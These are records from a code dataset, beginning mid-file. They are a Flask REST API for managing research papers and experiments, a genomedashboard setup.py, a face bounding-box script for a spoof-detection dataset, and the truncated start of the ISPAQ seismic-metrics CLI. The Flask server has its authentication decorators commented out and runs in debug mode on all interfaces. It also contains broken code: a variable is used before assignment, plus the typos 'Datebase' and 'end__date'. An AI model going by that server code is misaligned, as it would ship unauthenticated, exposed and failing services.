start_date, end_date, goal, input, method, result):\n self.cur.execute(\"UPDATE experiment SET research_id = %s, researcher_id = %s, start_date = %s, end_date = %s, goal = %s, input = %s, method = %s, result = %s WHERE id = %s\", (research_id, researcher_id, start_date, end_date, goal, input, method, result, id))\n self.con.commit()\n self.close()\n return id\n\n def delete_experiment(self, id, research_id, researcher_id):\n num_row = self.cur.execute(\"DELETE FROM experiment WHERE id = %s AND research_id = %s AND researcher_id = %s\", (id, research_id, researcher_id))\n self.con.commit()\n self.close()\n return num_row\n\n\nclass User():\n def __init__(self, id, username, fullname):\n self.id = id\n self.username = username\n self.fullname = fullname\n\n def generate_auth_token(self, expiration = 600):\n print('generate_auth_token enter')\n s = Serializer(app.config['SECRET_KEY'], expires_in = expiration)\n return s.dumps({ 'id': self.id })\n\n @staticmethod\n def verify_auth_token(token):\n print('verify auth token enter')\n s = Serializer(app.config['SECRET_KEY'])\n try:\n data = s.loads(token)\n except SignatureExpired:\n # valid token, but expired => generate new\n print(data['id'])\n except BadSignature:\n return None # invalid token\n db = Datebase()\n user = db.getUser(data['id'])\n if user:\n return User(user['id'], user['username'], user['fullname'])\n return None\n\n@auth.verify_password\ndef verify_password(username, password):\n print('verify password enter')\n print('username: ' + username)\n # first try to authenticate by token\n user = User.verify_auth_token(username)\n if not user:\n # try to authenticate with username/password\n db = Database()\n result = db.check_login(username, password)\n if not result:\n return False\n user = User(result['id'], result['username'], result['fullname'])\n \n g.user = user\n return True\n\n@auth.error_handler\ndef unauthorized():\n # return 403 instead of 401 to prevent browsers from displaying the default\n # auth dialog\n return make_response(jsonify({'message': 'Unauthorized access'}), 403)\n\n@app.route('/api/v1/token', methods=['POST','OPTIONS'])\n@cross_origin()\n@auth.login_required\ndef get_auth_token():\n print('get_auth_token enter')\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600, 'id': g.user.id, 'username': g.user.username, 'fullname': g.user.fullname})\n\n\nclass PaperListAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('offsetStart', type=int, location='json')\n self.reqparse.add_argument('pageSize', type=int, location='json')\n super(PaperListAPI, self).__init__()\n\n def get(self, rid=0):\n args = self.reqparse.parse_args()\n if not args:\n offsetStart = 0\n pageSize = 99999\n else:\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['offsetStart']:\n offsetStart = 0\n if not inputs['pageSize']:\n pageSize = 99999\n\n db = Database()\n if not rid or rid == 0:\n papers = db.list_papers(offsetStart, pageSize)\n else:\n papers = db.list_papers_by_researcher(str(rid), offsetStart, pageSize)\n for paper in papers:\n read_date = paper['read_date']\n paper['read_date'] = read_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'papers': papers}\n\n\nclass PaperAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('title', type=str, location='json')\n self.reqparse.add_argument('authors', type=str, location='json')\n self.reqparse.add_argument('conference', type=str, location='json')\n self.reqparse.add_argument('year', type=str, location='json')\n self.reqparse.add_argument('affiliation', type=str, location='json')\n self.reqparse.add_argument('comments', type=str, location='json')\n self.reqparse.add_argument('abstract', type=str, location='json')\n self.reqparse.add_argument('read_by', type=int, location='json')\n self.reqparse.add_argument('read_date', type=str, location='json')\n self.reqparse.add_argument('research_id', type=int, location='json')\n self.reqparse.add_argument('keys', type=str, location='json')\n self.reqparse.add_argument('paper_link', type=str, location='json')\n super(PaperAPI, self).__init__()\n\n def get(self, id):\n db = Database()\n paper = db.get_paper(str(id))\n if paper and len(paper) > 0:\n paper = paper[0]\n read_date = paper['read_date']\n paper['read_date'] = read_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'paper': paper}\n\n def post(self, id=0):\n try: \n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['read_date']:\n now = datetime.now()\n inputs['read_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if id == 0:\n new_id = db.insert_paper(inputs['title'], inputs['authors'], inputs['conference'], inputs['year'], inputs['affiliation'], inputs['abstract'], inputs['comments'], inputs['read_by'], inputs['read_date'], inputs['research_id'], inputs['keys'], inputs['paper_link'])\n else:\n db.update_paper(str(id), inputs['read_by'], inputs['title'], inputs['authors'], inputs['conference'], inputs['year'], inputs['affiliation'], inputs['abstract'], inputs['comments'], inputs['read_by'], inputs['read_date'], inputs['research_id'], inputs['keys'], inputs['paper_link'])\n new_id = id\n return {'id': new_id}\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, id):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_paper(str(id), inputs['read_by'])\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass PaperContributeAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('comment_id', type=int, location='json')\n self.reqparse.add_argument('user_id', type=int, location='json')\n self.reqparse.add_argument('paper_id', type=int, location='json')\n self.reqparse.add_argument('comment', type=str, location='json')\n super(PaperContributeAPI, self).__init__()\n\n def get(self, paper_id):\n db = Database()\n comments = db.get_comments(str(paper_id))\n for comment in comments:\n comment_date = comment['contribution_date']\n comment['contribution_date'] = comment_date.strftime('%Y/%m/%d %H:%M:%S')\n return {'comments': comments}\n\n def post(self, paper_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n now = datetime.now()\n inputs['contribution_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if not inputs['comment_id']:\n new_id = db.insert_comment(inputs['paper_id'], inputs['user_id'], inputs['comment'], inputs['contribution_date'])\n else:\n new_id = db.update_comment(inputs['comment_id'], inputs['paper_id'], inputs['user_id'], inputs['comment'], inputs['contribution_date'])\n return {'id': new_id}\n\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, paper_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_comment(str(inputs['comment_id']), str(inputs['paper_id']), str(inputs['user_id']))\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\n\nclass ResearcherListAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ResearcherListAPI, self).__init__()\n\n def get(self):\n db = Database()\n researchers = db.list_researchers()\n return {'researchers': researchers}\n\nclass ResearcherAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ResearcherAPI, self).__init__()\n\n def get(self, id):\n db = Database()\n researcher = db.get_researcher(str(id))\n return {'researcher': researcher}\n\nclass ResearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('name', type=str, location='json')\n self.reqparse.add_argument('goals', type=str, location='json')\n self.reqparse.add_argument('start_date', type=str, location='json')\n self.reqparse.add_argument('end_date_plan', type=str, location='json')\n self.reqparse.add_argument('created_by', type=int, location='json')\n self.reqparse.add_argument('type', type=int, location='json')\n self.reqparse.add_argument('offsetStart', type=int, location='json')\n self.reqparse.add_argument('pageSize', type=int, location='json')\n super(ResearchAPI, self).__init__()\n\n def get(self, id=0):\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['offsetStart']:\n offsetStart = 0\n if not inputs['pageSize']:\n pageSize = 99999\n\n db = Database()\n if id > 0:\n research_list = db.get_research(str(id))\n db = Database()\n papers = db.list_papers_by_project(str(id), offsetStart, pageSize)\n else:\n research_list = db.list_research()\n papers = []\n for r in research_list:\n r['start_date'] = r['start_date'].strftime('%Y/%m/%d %H:%M:%S')\n if (r['end_date_plan']):\n r['end_date_plan'] = r['end_date_plan'].strftime('%Y/%m/%d %H:%M:%S')\n if (r['end_date_actual']):\n r['end_date_actual'] = r['end_date_actual'].strftime('%Y/%m/%d %H:%M:%S')\n for p in papers:\n p['read_date'] = p['read_date'].strftime('%Y/%m/%d %H:%M:%S')\n return [{'researches': research_list}, {'papers': papers}]\n\n def post(self, id=0):\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['start_date']:\n now = datetime.now()\n inputs['start_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n if not inputs['end_date_plan']:\n inputs['end_date_plan'] = None\n db = Database()\n if id == 0:\n new_id = db.insert_research(inputs['name'], inputs['goals'], inputs['start_date'], inputs['end_date_plan'], inputs['created_by'], inputs['type'])\n else:\n new_id = db.update_research(str(id), inputs['name'], inputs['goals'], inputs['start_date'], inputs['end_date_plan'], inputs['created_by'], inputs['type'])\n return {'id': new_id}\n\n def delete(self, id):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_research(str(id), inputs['created_by'])\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass ExperimentAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('experiment_id', type=int, location='json')\n self.reqparse.add_argument('researcher_id', type=int, location='json')\n self.reqparse.add_argument('research_id', type=int, location='json')\n self.reqparse.add_argument('start_date', type=str, location='json')\n self.reqparse.add_argument('end_date', type=str, location='json')\n self.reqparse.add_argument('goal', type=str, location='json')\n self.reqparse.add_argument('input', type=str, location='json')\n self.reqparse.add_argument('method', type=str, location='json')\n self.reqparse.add_argument('result', type=str, location='json')\n super(ExperimentAPI, self).__init__()\n\n def get(self, research_id):\n db = Database()\n results = db.get_experiments(str(research_id))\n for result in results:\n start_date = result['start_date']\n if start_date:\n result['start_date'] = start_date.strftime('%Y/%m/%d %H:%M:%S')\n end_date = result['end_date']\n if end_date:\n result['end_date'] = end__date.strftime('%Y/%m/%d %H:%M:%S')\n return {'experiments': results}\n\n def post(self, research_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n if not inputs['start_date']:\n now = datetime.now()\n inputs['start_date'] = now.strftime('%Y/%m/%d %H:%M:%S')\n db = Database()\n if not inputs['experiment_id']:\n new_id = db.insert_experiment(inputs['research_id'], inputs['researcher_id'], inputs['start_date'], inputs['end_date'], inputs['goal'], inputs['input'], inputs['method'], inputs['result'])\n else:\n new_id = db.update_experiment(inputs['experiment_id'], inputs['research_id'], inputs['researcher_id'], inputs['start_date'], inputs['end_date'], inputs['goal'], inputs['input'], inputs['method'], inputs['result'])\n return {'id': new_id}\n\n except Exception as e:\n return {'error': str(e)}\n\n def delete(self, research_id=0):\n try:\n args = self.reqparse.parse_args()\n inputs = {}\n for k, v in args.items():\n inputs[k] = v\n db = Database()\n num_row = db.delete_experiment(str(inputs['experiment_id']), str(inputs['research_id']), str(inputs['researcher_id']))\n return {'num_row': num_row}\n except Exception as e:\n return {'error': str(e)}\n\nclass ConferenceAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ConferenceAPI, self).__init__()\n\n def get(self):\n db = Database()\n confs = db.list_confs()\n for conf in confs:\n if conf['start_date']:\n conf['start_date'] = conf['start_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['end_date']:\n conf['end_date'] = conf['end_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['submit_date']:\n conf['submit_date'] = conf['submit_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['notification_date']:\n conf['notification_date'] = conf['notification_date'].strftime('%Y/%m/%d %H:%M:%S')\n if conf['type'] == 1:\n conf['type'] = 'conference'\n else:\n conf['type'] = 'journal'\n return {'confs': confs}\n\nclass ConferenceSearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(ConferenceSearchAPI, self).__init__()\n\n def get(self, search_key):\n db = Database()\n confs = db.search_confs(\"%\" + search_key + \"%\")\n for conf in confs:\n if conf['type'] == 1:\n conf['type'] = 'conference'\n else:\n conf['type'] = 'journal'\n return {'confs': confs}\n\nclass PaperSearchAPI(Resource):\n #decorators = [auth.login_required]\n\n def __init__(self):\n super(PaperSearchAPI, self).__init__()\n\n def get(self, search_key):\n db = Database()\n papers = db.search_papers(\"%\" + search_key + \"%\")\n for paper in papers:\n if paper['read_date']:\n paper['read_date'] = paper['read_date'].strftime('%Y/%m/%d %H:%M:%S')\n return {'papers': papers}\n\napi.add_resource(ResearcherAPI, '/api/v1/researcher/', endpoint='researcher')\napi.add_resource(ResearcherListAPI, '/api/v1/researchers', endpoint='researchers')\napi.add_resource(PaperListAPI, '/api/v1/papers')\napi.add_resource(PaperListAPI, '/api/v1/papers/', endpoint='papers')\napi.add_resource(PaperAPI, '/api/v1/paper/', endpoint='paper')\napi.add_resource(PaperContributeAPI, '/api/v1/comment/', endpoint='comment')\napi.add_resource(ResearchAPI, '/api/v1/research/', endpoint='research')\napi.add_resource(ExperimentAPI, '/api/v1/experiment/', endpoint='experiment')\napi.add_resource(ConferenceAPI, '/api/v1/conf', endpoint='conf')\napi.add_resource(ConferenceSearchAPI, '/api/v1/conf/search/')\napi.add_resource(PaperSearchAPI, '/api/v1/paper/search/')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=38500)\n","repo_name":"alexbui91/happy_research","sub_path":"backend/rest-server-v2.py","file_name":"rest-server-v2.py","file_ext":"py","file_size_in_byte":29492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37169740253","text":"\"\"\"A setuptools based setup module.\n\nSee:\n https://packaging.python.org/guides/distributing-packages-using-setuptools/\n https://github.com/pypa/sampleproject\n\"\"\"\n\n\"\"\"\nPACKAGE PUBLISHING STEPS:\n\n 1. Update the ./HISTORY.md file with the latest release notes.\n 2. Increment the version number.\n -- Increment the version number in ./docs/version.md manually.\n -- Increment the version number in ./setup.py (below) manually.\n ** These values must match!!!\n 4. Build the package:\n > python setup.py sdist\n ** Making the wheel and bdists causes issues with pip install right now.\n 5. Check with package:\n > twine check dist/*\n 6. Test PyPI upload:\n > twine upload --repository-url https://test.pypi.org/legacy/ dist/*\n 7. Upload to PyPI:\n > twine upload --repository-url https://upload.pypi.org/legacy/ dist/*\n\n Notes:\n - Uploads require a PyPI user account.\n - Use the twine keyring feature for cli credential management locally: https://pypi.org/project/twine/\n - Use the pypi-cli package to inspect package info and status: https://pypi.org/project/pypi-cli/\n ex. > pypi info genomedashboard\n\nTEST PYPI PACKAGE:\n\n 1. Install from test-pypi to validate package locally.\n > pip install -i https://test.pypi.org/simple/ genomedashboard\n > pip install -i https://test.pypi.org/simple/ genomedashboard==$VERSION\n 2. Install from PyPI and test once package passes validation.\n > pip install genomedashboard\n\"\"\"\n\n\n# Favor setuptools over distutils.\n# io.open is needed for projects that support Python 2.7\n# It ensures open() defaults to text mode with universal newlines,\n# and accepts an argument to specify the text encoding\n# Python 3 only projects can skip this import\n\nfrom setuptools import setup, find_packages\nfrom os import path\nfrom io import open\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n readme = f.read()\n\nsetup(\n name='genomedashboard',\n version='0.0.90',\n description='Genome Dashboard is the logic behind a web-based prototype of a genomics dashboard, specifically designed to integrate informatics and 4D material studies of chromatin. Genome Dashboard unites our Interactive Chromatin Modeling (ICM) tools with the Biodalliance genome browser and the JSMol molecular viewer to rapidly fold any DNA sequence into atomic or coarse-grained models of DNA, nucleosomes or chromatin.',\n package_dir={'': 'src'},\n packages=find_packages(where='src'),\n scripts=['src/genomedashboard.py'],\n python_requires='>=2.7, ==3.*, <4',\n author='Genome Dashboard Team',\n author_email='genome.dashboard@gmail.com',\n long_description=readme,\n long_description_content_type='text/markdown',\n license='Louisiana Tech University License',\n url='http://dna.engr.latech.edu/~gdash/GDash-landing-page/',\n download_url='https://pypi.org/project/genomedashboard/#files',\n project_urls={\n 'PyPI': 'https://pypi.org/project/genomedashboard/',\n 'Documentation': 'https://genomedashboard.readthedocs.io/en/latest/readme.html',\n 'Source Code': 'https://github.com/genomeDashboard/genomedashboard',\n 'Issue Tracker': 'https://github.com/genome-dashboard/genome-dashboard-python/issues',\n 'Demo': 'http://dna.engr.latech.edu/~gdash/',\n # 'Funding': 'https://donate.pypi.org',\n # 'Say Thanks!': 'http://saythanks.io/to/example',\n },\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Healthcare Industry',\n 'Intended Audience :: Education',\n 'Topic :: Software Development :: Libraries',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n \"Programming Language :: Python :: 2\",\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n keywords='python biology genomics genome dashboard',\n install_requires=[\n 'setuptools',\n 'docutils>=0.3',\n # 'click>=6.0',\n 'twobitreader',\n 'pyBigWig',\n 'numpy',\n 'scipy',\n 'matplotlib',\n ],\n extras_require={\n 'dev': ['check-manifest'],\n 'test': ['coverage'],\n },\n package_data={\n '': ['data/*.dat', 'data/*.txt'],\n },\n entry_points={\n # 'console_scripts': ['genomedashboard=src.genomedashboard:main'],\n },\n include_package_data=True,\n zip_safe=False,\n setup_requires=[\n 'setuptools',\n 'docutils>=0.3',\n # 'click>=6.0',\n 'twobitreader',\n 'pyBigWig',\n 'numpy',\n 'scipy',\n 'matplotlib',\n ],\n test_suite='tests',\n test_requires=[\n 'unittest',\n # 'click>=6.0',\n 'numpy',\n ]\n)\n","repo_name":"genome-dashboard/genome-dashboard-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35291329386","text":"import numpy as np\nimport cv2\nimport os\n\n\ndef getbboxesinfo(path, image_names, showResults=False):\n faceCascade = cv2.CascadeClassifier(\"./classifiers/haarcascade_frontalface_default.xml\")\n widths = []\n heights = []\n iterations = len(image_names)\n count = 0\n for img_name in image_names:\n image = cv2.imread(path + img_name)\n\n dim = tuple((np.array([image.shape[1], image.shape[0]]) / 4).astype(np.int))\n image = cv2.resize(image, dim)\n\n rects_face = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(100, 100),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n if img_name == \"USUARIO_058.JPG\":\n rects_face = rects_face[0:1]\n elif img_name == \"USUARIO_128.JPG\":\n rects_face = rects_face[1:2]\n elif img_name == \"spoof_058.JPG\":\n rects_face = rects_face[2:3]\n elif img_name == \"spoof_090.JPG\":\n rects_face = rects_face[0:1]\n\n for r in rects_face:\n widths.append(r[2])\n heights.append(r[3])\n cv2.rectangle(image, (r[0], r[1]), (r[0] + r[2], r[1] + r[3]), (0, 255, 0), 3)\n\n if showResults == True:\n cv2.imshow(img_name, image)\n cv2.waitKey()\n cv2.destroyWindow(img_name)\n count += 1\n print(str(round(count/iterations * 100)) + \"%\")\n\n nd_w = np.array(widths)\n nd_h = np.array(heights)\n\n w = [np.average(nd_w), np.max(nd_w), np.min(nd_w)]\n h = [np.average(nd_h), np.max(nd_h), np.min(nd_h)]\n\n return w, h\n\n\nuser_path = \"./data/COLOR/USER/\"\nattack_path = \"./data/COLOR/attack_01/\"\n\nuser_image_names = os.listdir(user_path)\nattack_image_names = os.listdir(attack_path)\n\nw_users, h_users = getbboxesinfo(user_path, user_image_names)\nw_attack, h_attack = getbboxesinfo(attack_path, attack_image_names)\n\nprint()\nprint(\"[avg, max, min]\")\nprint(\"Users info:\", w_users, h_users)\nprint(\"Attacks info:\", w_attack, h_attack)\n\n\n\n","repo_name":"alvarogharo/biometric-attack-detection","sub_path":"face-bbox-avg-size.py","file_name":"face-bbox-avg-size.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73625011626","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"ispaq.ispaq: provides entry point main().\"\"\"\n\n# Basic modules\nimport os\nimport sys\nimport imp\nimport argparse\nimport datetime\nimport logging\nimport numpy as np\nimport subprocess\nfrom _ast import Try\nfrom numpy.random import sample\n\n__version__ = \"3.1.2\"\n\n# dictionary of currently defined ISPAQ metric groups and business logic\n# for comparison with R package IRISMustangMetrics/ISPAQUtils.R json\n\ndef currentispaq():\n # The metrics that are inside of each of these (ex basicStats) is defined in ISPAQUtils.R and returned in the function getMetricFunctionMetadata\n groups = {'simple': ['basicStats','gaps','numSpikes','STALTA','stateOfHealth','maxRange'],\n 'SNR': ['SNR'],\n 'PSD': ['PSD','PSDText','PDF'],\n 'crossCorrelation': ['crossCorrelation'],\n 'crossTalk': ['crossTalk'],\n 'orientationCheck': ['orientationCheck'],\n 'pressureCorrelation': ['pressureCorrelation'],\n 'transferFunction': ['transferFunction'],\n 'sampleRate': ['sampleRateResp','sampleRateChannel'] }\n return groups\n\ndef main():\n \n # Check our Conda environment ----------------------------------------------\n # let's check for our primary supporting python modules\n try:\n imp.find_module('rpy2')\n imp.find_module('obspy')\n imp.find_module('pandas')\n except ImportError as e:\n print('ERROR: please activate your ispaq environment before running: %s' % e)\n raise SystemExit\n \n # Parse arguments ----------------------------------------------------------\n \n epilog_text='If no preference file is specified and the default file ./preference_files/default.txt cannot be found:\\n--csv_dir, pdf_dir, and psd_dir default to \".\"\\n--sncl_format defaults to \"N.S.C.L\"\\n--sigfigs defaults to \"6\"\\n--pdf_type defaults to \"plot,text\"\\n--pdf_interval defaults to \"aggregated\"\\n--plot_include defaults to \"colorbar,legend\"'\n parser = argparse.ArgumentParser(description=\" \".join([\"ISPAQ version\",__version__]), epilog=epilog_text,formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog,max_help_position=35,width=82))\n parser._optionals.title = \"single arguments\"\n\n metrics = parser.add_argument_group('arguments for running metrics')\n metrics.add_argument('-P', '--preferences-file', required=False, help='path to preference file, default=./preference_files/default.txt')\n metrics.add_argument('-M', '--metrics', required=False,\n help='single Metrics alias as defined in preference file, or one or \\nmore metric names in a comma-separated list, required')\n metrics.add_argument('-S', '--stations', required=False,\n help='single Station_SNCLs alias as defined in preference file, or \\none or more SNCL[Q] in a comma-separated list, required.\\nnotes: SNCL[Q] refers to Station.Network.Channel.Location.(optional)Quality\\n If using wildcarding, enclose in quotation marks')\n metrics.add_argument('--starttime', required=False,\n help='starttime in ObsPy UTCDateTime format, required for webservice requests \\nand defaults to earliest data file for local data \\nexamples: YYYY-MM-DD, YYYYMMDD, YYYY-DDD, YYYYDDD[THH:MM:SS]')\n metrics.add_argument('--endtime', required=False,\n help='endtime in ObsPy UTCDateTime format, default=starttime + 1 day; \\nif starttime is also not specified then it defaults to the latest data \\nfile for local data \\nexamples: YYYY-MM-DD, YYYYMMDD, YYYY-DDD, YYYYDDD[THH:MM:SS]')\n \n \n prefs = parser.add_argument_group('optional arguments for overriding preference file entries')\n prefs.add_argument('--dataselect_url', required=False,\n help='FDSN webservice or path to directory with miniSEED files')\n prefs.add_argument('--station_url', required=False,\n help='FDSN webservice or path to stationXML file')\n prefs.add_argument('--event_url', required=False,\n help='FDSN webservice or path to QuakeML file')\n prefs.add_argument('--resp_dir', required=False,\n help='path to directory with RESP files')\n prefs.add_argument('--output', required=False,\n help='write metrics to csv file (csv) or sqlite database file (db). Options: csv, db')\n prefs.add_argument('--db_name', required=False,\n help='name of sqlite database file, if output=csv')\n prefs.add_argument('--csv_dir', required=False,\n help='directory to write generated metrics .csv files, if output=csv')\n prefs.add_argument('--psd_dir', required=False,\n help='directory to write/read existing PSD .csv files, if output=csv')\n prefs.add_argument('--pdf_dir', required=False,\n help='directory to write generated PDF files')\n prefs.add_argument('--pdf_type', required=False,\n help='output format of generated PDFs - text and/or plot')\n prefs.add_argument('--pdf_interval', required=False,\n help='time span for PDFs - daily and/or aggregated over the entire span')\n prefs.add_argument('--plot_include', required=False,\n help='PDF plot graphics options - legend, colorbar, and/or fixed_yaxis_limits, \\nor none')\n prefs.add_argument('--sncl_format', required=False,\n help='format of SNCL aliases and miniSEED file names \\nexamples:\"N.S.L.C\",\"S.N.L.C\"\\nwhere N=network code, S=station code, L=location code, C=channel code')\n prefs.add_argument('--sigfigs', required=False, help='number of significant figures used for output columns named \"value\"')\n prefs.add_argument('--sds_files',action='store_true',default=False,help='if set, ISPAQ will look for local data files with Seiscomp SDS naming format \\nNET.STA.LOC.CHAN.TYPE.YEAR.DAY where TYPE=D')\n \n other = parser.add_argument_group('other arguments')\n other.add_argument('--log-level', action='store', default='INFO',\n choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'],\n help='log level printed to console, default=\"INFO\"')\n parser.add_argument('-A', '--append', action='store_true', default=False,\n help='append to TRANSCRIPT file rather than overwriting')\n parser.add_argument('-V', '--version', action='version',\n version='%(prog)s ' + __version__)\n parser.add_argument('-I', '--install-r',action='store_true', default=False,\n help='install CRAN IRIS Mustang packages, and exit')\n parser.add_argument('-U', '--update-r', action='store_true', default=False,\n help='check for and install newer CRAN IRIS Mustang packages \\nand/or update required conda packages, and exit')\n parser.add_argument('-L', '--list-metrics', action='store_true', default=False,\n help='list names of available metrics and exit')\n\n try:\n args = parser.parse_args(sys.argv[1:])\n except IOError as msg:\n print(str(msg))\n parser.error(str(msg)) # we may encounter an error accessing the indicated file\n raise SystemExit\n \n # Set up logging -----------------------------------------------------------\n \n # Full DEBUG level logging goes to ISPAQ_TRANSCRIPT.log\n # Console logging level is set by the '--log-level' argument\n \n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n \n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n \n if args.append:\n fh = logging.FileHandler('ISPAQ_TRANSCRIPT.log', mode='a')\n else:\n fh = logging.FileHandler('ISPAQ_TRANSCRIPT.log', mode='w')\n\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n ch = logging.StreamHandler()\n ch.setLevel(getattr(logging, args.log_level))\n ch.setFormatter(formatter) \n logger.addHandler(ch)\n\n logger.info('Running ISPAQ version %s on %s' % (__version__, datetime.datetime.now().strftime('%c')))\n\n # check that IRIS CRAN packages are installed\n\n import obspy\n from distutils.version import StrictVersion\n from . import updater \n import rpy2.robjects as ro\n from rpy2 import rinterface \n from rpy2.robjects import pandas2ri\n from rpy2.robjects.packages import importr\n from rpy2.robjects.conversion import localconverter\n\n IRIS_packages = ['seismicRoll','IRISSeismic','IRISMustangMetrics']\n\n r_installed = ro.r(\"installed.packages()\")\n\n with localconverter(ro.default_converter + pandas2ri.converter):\n installed_names = ro.conversion.rpy2py(r_installed.rownames).tolist()\n\n flag=0\n for package in IRIS_packages:\n if package not in installed_names:\n print(\"IRIS R package \" + package + \" is not installed\")\n flag=1\n if (flag == 1):\n print(\"\\nAttempting to install IRIS R packages from CRAN\")\n updater.install_IRIS_packages_missing(IRIS_packages,logger)\n\n\n # Validate the args --------------------------------------------------------\n \n # We can't use required=True in argpase because folks should be able to type only -U\n \n if not (args.update_r or args.install_r or args.list_metrics):\n # metric sets\n if args.metrics is None:\n logger.critical('argument -M/--metrics is required to run metrics')\n raise SystemExit\n \n # stations sets\n if args.stations is None:\n logger.critical('argument -S/--stations is required to run metrics')\n raise SystemExit\n \n \n # Handle R package upgrades ------------------------------------------------\n\n _R_install_packages = ro.r('utils::install.packages')\n\n if args.install_r:\n logger.info('(Re)installing IRIS R packages from CRAN')\n updater.install_IRIS_packages(IRIS_packages,logger)\n sys.exit(0)\n\n if args.update_r:\n logger.info('Checking for recommended conda packages...')\n x=ro.r(\"packageVersion('base')\")\n x_str = \".\".join(map(str,np.array(x.rx(1)).flatten()))\n if ((StrictVersion(obspy.__version__) < StrictVersion(\"1.4.0\")) \n or (StrictVersion(x_str) < StrictVersion(\"3.6.0\")) ):\n logger.debug('obspy>=1.4.0 or r>=3.6 not found')\n logger.info('Updating conda packages...')\n conda_str = (\"conda install -c conda-forge pandas=1.2.3 obspy=1.4.0 r=3.6 \" +\n \" r-rcurl=1.98_1.3 r-xml=3.99_0.3 r-dplyr=1.0.6 r-quadprog=1.5_8 r-signal=0.7_6\" +\n \" r-pracma=2.3.3 rpy2=3.1.0 r-stringr=1.4.0 numpy=1.21.4 r-rcpp=1.0.6\")\n subprocess.call(conda_str, shell=True)\n logger.info('(Re)installing IRIS R packages from CRAN')\n try:\n for package in IRIS_packages:\n _R_install_packages(package)\n logger.info('Installed %s' % (package))\n except Exception as e:\n logger.error('Unable to install %s: %s' % (package,e))\n else:\n logger.info('Required conda packages found')\n\n logger.info('Checking for IRIS R package updates...')\n df = updater.get_IRIS_package_versions(IRIS_packages,logger)\n print('\\n%s\\n' % df)\n updater.update_IRIS_packages(IRIS_packages,logger)\n sys.exit(0)\n\n if args.list_metrics:\n logger.info('Checking for available metrics in IRIS R packages...')\n from . import irismustangmetrics\n default_function_dict = irismustangmetrics.function_metadata()\n ispaq_dict = currentispaq()\n metricList = []\n for function_name in default_function_dict:\n default_function = default_function_dict[function_name]\n bLogic = default_function['businessLogic']\n for metric_name in default_function['metrics']:\n if metric_name not in ['pdf_plot','pdf_text']:\n if bLogic not in ispaq_dict: \n metricList.append(metric_name + \" 